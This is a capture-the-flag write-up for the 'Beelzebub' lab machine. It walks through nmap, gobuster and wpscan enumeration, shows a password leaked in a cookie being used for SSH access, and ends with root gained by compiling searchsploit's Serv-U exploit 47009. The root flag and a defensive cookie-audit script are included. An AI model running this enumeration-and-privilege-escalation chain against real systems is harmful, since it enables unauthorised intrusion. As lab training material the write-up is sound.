CTF: Beelzebub
Information
- IP: 192.168.0.173
- MYIP: 192.168.0.36
First enumeration
Basics
- NMAP
```console
$ sudo nmap -p- -A 192.168.0.173
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-03 00:12 CET
Nmap scan report for 192.168.0.173
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:EB:0C:6A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.0.173

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.28 seconds
```

- Gobuster

```console
$ gobuster dir -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.173 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.173
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,pl,pub,cgi,js,php,tgz,bkp,tar,rb,html,php.bak,sql.bak,tar.gz,id_rsa,log,json,py,txt,bak,zip,csv,sql,rar,xml
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/03/03 00:13:37 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 271]
/index.html           (Status: 200) [Size: 10918]
/icons/               (Status: 403) [Size: 278]
/javascript/          (Status: 403) [Size: 278]
/phpmyadmin/          (Status: 200) [Size: 10639]
/phpinfo.php          (Status: 200) [Size: 95423]
/server-status/       (Status: 403) [Size: 278]
```
view-source:http://192.168.0.173/index.php
```html
[...]
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
[...]
```

Okayyy... So I can take the md5sum of beelzebub:

```console
$ echo -ne 'beelzebub' | md5sum -
d18e1e22becbd915b45e0e655429d487  -
```

I tried to use it with beelzebub as the SSH user, but nope... After a loooong search I tried this in curl:

```console
$ curl http://192.168.0.173/d18e1e22becbd915b45e0e655429d487
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/">here</a>.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.0.173 Port 80</address>
```

Well, I got a 301 and not a 404, so this means there is something there. Let's try with gobuster.
I first tried with -r to follow redirects, but it redirects to 192.168.1.6. So I tried without the -r param:
```console
$ gobuster dir -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php.bak,pl,php,sql,tgz,sh,cgi,js,zip,bkp,log,py,pub,html,txt,tar.gz,tar,rar,id_rsa,xml,json,bak,sql.bak,rb,csv
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/03/03 01:33:20 Starting gobuster in directory enumeration mode
===============================================================
/wp-content/          (Status: 200) [Size: 0]
/index.php            (Status: 200) [Size: 57718]
/wp-login.php         (Status: 200) [Size: 5694]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes/         (Status: 200) [Size: 45807]
/readme.html          (Status: 200) [Size: 7368]
/wp-admin/            (Status: 302) [Size: 0] [--> http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/wp-login.php?redirect_to=http%3A%2F%2F192.168.0.173%2Fd18e1e22becbd915b45e0e655429d487%2Fwp-admin%2F&reauth=1]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.1.6/d18e1e22becbd915b45e0e655429d487/wp-login.php?action=register]
```

As we can see, this is a WordPress website. So I decided to use wpscan, and I had to add --ignore-main-redirect to do so.
```console
$ wpscan --api-token xxxxx --force --url http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ -e u --ignore-main-redirect
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/ [192.168.0.173]
[+] Started: Thu Mar  3 01:36:43 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-Redirect-By: WordPress
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.6 identified (Insecure, released on 2020-10-30).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.3.6">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-admin/load-styles.php, Match: '5.3.6'
 |
 | [!] 8 vulnerabilities identified:
 |
 | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure
 |     Fixed in: 5.3.7
 |     References:
 |      - https://wpscan.com/vulnerability/6a3ec618-c79e-4b9c-9020-86b157458ac5
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29450
 |      - https://wordpress.org/news/2021/04/wordpress-5-7-1-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2021/04/15/wordpress-571-security-vulnerability-release.html
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pmmh-2f36-wvhq
 |      - https://core.trac.wordpress.org/changeset/50717/
 |      - https://www.youtube.com/watch?v=J2GXmxAdNWs
 |
 | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer
 |     Fixed in: 5.3.8
 |     References:
 |      - https://wpscan.com/vulnerability/4cd46653-4470-40ff-8aac-318bee2f998d
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36326
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19296
 |      - https://github.com/WordPress/WordPress/commit/267061c9595fedd321582d14c21ec9e7da2dcf62
 |      - https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
 |      - https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9
 |      - https://www.wordfence.com/blog/2021/05/wordpress-5-7-2-security-release-what-you-need-to-know/
 |      - https://www.youtube.com/watch?v=HaW15aMzBUM
 |
 | [!] Title: WordPress < 5.8.2 - Expired DST Root CA X3 Certificate
 |     Fixed in: 5.3.10
 |     References:
 |      - https://wpscan.com/vulnerability/cc23344a-5c91-414a-91e3-c46db614da8d
 |      - https://wordpress.org/news/2021/11/wordpress-5-8-2-security-and-maintenance-release/
 |      - https://core.trac.wordpress.org/ticket/54207
 |
 | [!] Title: WordPress < 5.8 - Plugin Confusion
 |     Fixed in: 5.8
 |     References:
 |      - https://wpscan.com/vulnerability/95e01006-84e4-4e95-b5d7-68ea7b5aa1a8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44223
 |      - https://vavkamil.cz/2021/11/25/wordpress-plugin-confusion-update-can-get-you-pwned/
 |
 | [!] Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209
 |
 | [!] Title: WordPress < 5.8.3 - Author+ Stored XSS via Post Slugs
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/dc6f04c2-7bf2-4a07-92b5-dd197e4d94c8
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-699q-3hj9-889w
 |      - https://hackerone.com/reports/425342
 |      - https://blog.sonarsource.com/wordpress-stored-xss-vulnerability
 |
 | [!] Title: WordPress 4.1-5.8.2 - SQL Injection via WP_Meta_Query
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/24462ac4-7959-4575-97aa-a6dcceeae722
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21664
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jp3p-gw8h-6x86
 |
 | [!] Title: WordPress < 5.8.3 - Super Admin Object Injection in Multisites
 |     Fixed in: 5.3.11
 |     References:
 |      - https://wpscan.com/vulnerability/008c21ab-3d7e-4d97-b6c3-db9d83f390a7
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21663
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-jmmq-m8p8-332h
 |      - https://hackerone.com/reports/541469

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:09 <=========================================> (10 / 10) 100.00% Time: 00:00:09

[i] User(s) Identified:

[+] valak
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] krampus
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 1
 | Requests Remaining: 24

[+] Finished: Thu Mar  3 01:37:04 2022
[+] Requests Done: 55
[+] Cached Requests: 11
[+] Data Sent: 17.365 KB
[+] Data Received: 165.273 KB
[+] Memory used: 112.207 MB
[+] Elapsed time: 00:00:20
```
So we have two users: valak and krampus.
In the meantime I checked the directories found by gobuster and found something interesting: http://192.168.0.173/d18e1e22becbd915b45e0e655429d487/wp-content/uploads/Talk%20To%20VALAK/
Vulnerabilities search
It seems to be a form to contact valak. So I tried to use it through Burp. In the response we got two cookies:

```html
HTTP/1.1 200 OK
Date: Thu, 03 Mar 2022 00:52:15 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: Cookie=b7d0eff31b9cde9a862dc157bb33ec2a
Set-Cookie: Password=M4k3Ad3a1
Vary: Accept-Encoding
Content-Length: 1964
Connection: close
Content-Type: text/html; charset=UTF-8
```
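A response that hands out a password in a Set-Cookie header is the kind of thing a response-header audit should catch. The following is an added example (my own code, not part of the write-up): it parses a raw HTTP response and flags cookies whose name looks like a credential or that lack the HttpOnly/Secure attributes; the sample response is reconstructed from the Burp capture above, and the `SENSITIVE_NAMES` pattern is my own choice.

```python
"""Added example: audit Set-Cookie headers of a captured HTTP response."""
import re

# Cookie names that should never carry a secret in clear text (my own list).
SENSITIVE_NAMES = re.compile(r"(pass(word|wd)?|pwd|secret|token|apikey|api_key)", re.I)


def parse_set_cookies(raw_response: str) -> list[dict]:
    """Return one dict per Set-Cookie header: name, value and lower-cased attributes."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    cookies = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if not line.lower().startswith("set-cookie:"):
            continue
        # "name=value; Attr; Attr=val" -> split on ';' after dropping the header name
        parts = [p.strip() for p in line.split(":", 1)[1].split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {a.split("=", 1)[0].lower() for a in parts[1:] if a}
        cookies.append({"name": name, "value": value, "attrs": attrs})
    return cookies


def audit_cookies(raw_response: str) -> list[str]:
    """Return human-readable findings for risky Set-Cookie headers."""
    findings = []
    for c in parse_set_cookies(raw_response):
        if SENSITIVE_NAMES.search(c["name"]):
            findings.append(f"{c['name']}: credential-like cookie name")
        if "httponly" not in c["attrs"]:
            findings.append(f"{c['name']}: missing HttpOnly")
        if "secure" not in c["attrs"]:
            findings.append(f"{c['name']}: missing Secure")
    return findings


# Constructed sample, reconstructed from the response captured in the write-up.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 03 Mar 2022 00:52:15 GMT\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "Set-Cookie: Cookie=b7d0eff31b9cde9a862dc157bb33ec2a\r\n"
    "Set-Cookie: Password=M4k3Ad3a1\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html>...</html>"
)

for finding in audit_cookies(SAMPLE_RESPONSE):
    print("[!]", finding)
```

Running it on the sample prints five findings: both cookies lack HttpOnly and Secure, and the second one is flagged for its credential-like name.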
Exploit
Here we go! Let's try to use this password. It works for krampus!
We got a shell :)
Privilege escalation
Enumeration for privesc
Alright, by checking .bash_history it seems that we have to privesc via the Serv-U FTP server.

```console
$ searchsploit 47009
----------------------------------------------------------- ---------------------------------
 Exploit Title                                             |  Path
----------------------------------------------------------- ---------------------------------
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
----------------------------------------------------------- ---------------------------------
```
Exploit
On Kali:

```console
$ searchsploit -m linux/local/47009.c
$ scp 47009.c krampus@192.168.0.173:/home/krampus/
```

Then on the target:

```console
$ gcc 47009.c -o pe
$ ./pe
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(krampus)
opening root shell
# cd /root/
# ls
root.txt
# cat root.txt
8955qpasq8qq807879p75e1rr24cr1a5
```
\o/